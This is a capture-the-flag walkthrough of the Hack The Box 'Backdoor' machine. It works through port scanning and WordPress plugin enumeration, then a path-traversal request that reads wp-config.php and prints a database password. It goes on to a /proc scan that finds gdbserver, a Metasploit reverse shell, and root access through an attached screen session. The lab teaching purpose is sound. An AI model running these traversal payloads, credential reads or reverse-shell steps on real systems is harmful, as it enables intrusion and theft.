Backdoor - [HTB]

Cover Image for Backdoor - [HTB]

Table of Contents


    Backdoor is a Linux machine where the attacker will have to find executed commands through an LFI on a WordPress plugin. Finally, for becoming root will have to attach to a screen terminal as root.


    As always, let's start finding all opened ports in the machine with Nmap.

    kali@kali:~/Documents/HTB/backdoor$ sudo nmap -v -sS -p- -n -T5 -oN AllPorts.txt
    Warning: giving up on port because retransmission cap hit (2).
    Nmap scan report for
    Host is up (0.18s latency).
    Not shown: 65532 closed tcp ports (reset)
    22/tcp   open  ssh
    80/tcp   open  http
    1337/tcp open  waste
    Read data files from: /usr/bin/../share/nmap
    # Nmap done at Mon Nov 22 12:27:33 2021 -- 1 IP address (1 host up) scanned in 371.30 seconds

    Then, we continue with a deeper scan of every opened port, getting more information about each service.

    kali@kali:~/Documents/HTB/backdoor$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80,1337
    Nmap scan report for
    Host is up (0.18s latency).
    22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
    |   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
    |_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
    80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: Backdoor – Real-Life
    |_http-generator: WordPress 5.8.1
    1337/tcp open  waste?
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Looking for domains on the web page we can find the backdoor.htb.

    kali@kali:~/Documents/HTB/backdoor$ curl | grep --color .htb
    u-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20"><a href="http://backdoor.htb/">Home</a></li> 

    Enumerating WordPress with WpScan we can find an installed plugin.

    kali@kali:~/Documents/HTB/backdoor$ wpscan --url http://backdoor.htb/ -e ap,at,dbe,u --random-user-agent --detection-mode aggressive --plugins-detection aggressive --disable-tls-checks
    [+] ebook-download
     | Location: http://www.backdoor.htb/wp-content/plugins/ebook-download/
     | Last Updated: 2020-03-12T12:52:00.000Z
     | Readme: http://www.backdoor.htb/wp-content/plugins/ebook-download/readme.txt
     | [!] The version is out of date, the latest version is 1.5
     | [!] Directory listing is enabled
     | Found By: Known Locations (Aggressive Detection)
     |  - http://www.backdoor.htb/wp-content/plugins/ebook-download/, status: 200
     | Version: 1.1 (100% confidence)
     | Found By: Readme - Stable Tag (Aggressive Detection)
     |  - http://www.backdoor.htb/wp-content/plugins/ebook-download/readme.txt
     | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
     |  - http://www.backdoor.htb/wp-content/plugins/ebook-download/readme.txt


    The Ebook plugin has an associated vulnerability on exploit-db, which can be exploited with the following command:

    kali@kali:~/Documents/HTB/backdoor$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
    /** MySQL database username */                                                 
    define( 'DB_USER', 'wordpressuser' );                                          
    /** MySQL database password */                                                 
    define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );

    Exploitation 2

    Because port 1337 is very common in CTFs, maybe there is a custom binary listening on this port.

    In order to find the executed command, we can take advantage of the path traversal vulnerability iterating over the /proc/ folder.

    After waiting for some time, we can see that gdbserver has a listening port on 1337.

    kali@kali:~/Documents/HTB/backdoor$ for i in {1..10000}; do echo $i; curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/$i/cmdline 2>/dev/null | grep -v window.close ; done
    /proc/957/cmdline/proc/957/cmdline/proc/957/cmdline/bin/sh-cwhile true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done<script>w
    /proc/959/cmdline/proc/959/cmdline/proc/959/cmdline/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once /bin/true;"; done<script>win

    In Metasploit, there is an associated module for the gdbserver which allows us to obtain a reverse shell as "user".

    msf6 > use multi/gdb/gdb_server_exec
    msf6 exploit(multi/gdb/gdb_server_exec) > options
    Module options (exploit/multi/gdb/gdb_server_exec):
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXE_FILE  /bin/true        no        The exe to spawn when gdbserver is not attached to a process.
       RHOSTS    backdoor.htb     yes       The target host(s), see
       RPORT     1337             yes       The target port (TCP)
    Payload options (linux/x64/shell_reverse_tcp):
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST     yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    Exploit target:
       Id  Name
       --  ----
       1   x86_64 (64-bit)
    msf6 exploit(multi/gdb/gdb_server_exec) > exploit
    [*] Started reverse TCP handler on 
    [*] - Performing handshake with gdbserver...
    [*] - Stepping program to find PC...
    [*] - Writing payload at 00007ffff7fd0103...
    [*] - Executing the payload...
    [*] Command shell session 6 opened ( -> ) at 2021-11-22 14:22:35 -0500
    uid=1000(user) gid=1000(user) groups=1000(user)

    Privilege Escalation

    Enumerating with linpeas we can see that the root user is executing an infinite loop with a screen session.

    root         957  0.0  0.0   2608  1756 ?        Ss   11:19   0:14      _ /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -d mS root ;; done

    In order to access the active root screen, we need to execute the following command, which attaches to the current root session named "root".

    screen -x root/root 
    Must be connected to a terminal.

    However, we need to be in a proper terminal to execute the screen command, so we need to execute the following commands, becoming root.

    $ python3 -c "import pty;pty.spawn('/bin/bash')"
    user@Backdoor:/home/user$ screen -x root
    screen -x root
    Please set a terminal type.
    user@Backdoor:/home/user$ export TERM=xterm
    export TERM=xterm
    user@Backdoor:/home/user$ screen -x root
    screen -x root
    There is no screen to be attached matching root.
    user@Backdoor:/home/user$ screen -x root/root
    root@Backdoor:~# cat /root/root.txt